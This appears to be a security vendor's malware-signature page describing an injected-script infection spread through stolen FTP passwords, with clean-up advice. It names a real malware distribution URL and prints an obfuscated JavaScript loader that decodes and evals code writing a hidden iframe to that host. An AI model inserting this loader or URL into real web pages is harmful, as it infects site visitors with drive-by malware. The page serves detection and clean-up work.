SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs160

malware-entry-mwjs160

Description: This malware infects a web site through a compromised desktop (with virus), where
it steals any stored password from the FTP client and uses that to attack the site.

Note that every PHP, HTML and JS file can get compromised by this malware. On some variations of this attack, it is also compromised through vulnerable versions of Timthumb/WordPress.

Some anti virus programs will flag this type of malware (after infecting a computer) as Blackhole Exploit kit or similar names.

Affecting: Any web site with FTP enabled (and password stolen).

Domains distributing malware:


http://vvesek.freetcp.com/i/i.php?go=1
(many others)

Clean up: The desktop must be cleaned first. Use multiple AVs if necessary, since this
virus is very good at hiding from the current AV that is running. Once it is clean, then you
can clean up the sites and change the passwords.You can also sign up with us and let our team remove the malware for you.

Malware dump:

<script>if(window&#46document)a="rf3"&#46split("5236")&#46pop+'qwe';a=a"spli"+"t"&#46reverse()
["po"+"p"]();if(a=='f'||a=="n")
f=
[5,5,101,98,28,36,96,107,95,113,105,97,106,112,42,99,97,112,65,104,97,105,97,106,112,111,62,117,
80,93,99,74,93,105,97,36,35,94,107,96,117,35,37,87,44,89,37,119,5,5,5,101,98,110,93,105,97,110,36
,37,55,5,5,121,28,97,104,111,97,28,119,5,5,5,96,107,95,113,105,97,106,112,42,115,110,101,112,97,36
,30,56,101,98,110,93,105,97,28,111,110,95,57,35,100,112,112,108,54,43,43,114,114,97,111,97,103,42,
98,110,97,97,112,95,108,42,95,107,105,43,101,43,101,42,108,100,108,59,99,107,57,45,35,28,115,101,
96,112,100,57,35,45,44,35,28,100,97,101,99,100,112,57,35,45,44,35,28,111,112,117,104,97,57,35,114,
101,111,101,94,101,104,101,112,117,54,100,101,96,96,97,106,55,108,107,111,101,112,101,107,106,54,
...
..,121];md='a';q="q";ww=window;e=eval;w=f;s='';g='fromC';g=g+"harCod";g+='e';
for(i=0;i<w.length;i++){s=s+Stringg;}
if(!(a!='f'&&a!="n"))
e("e(s)');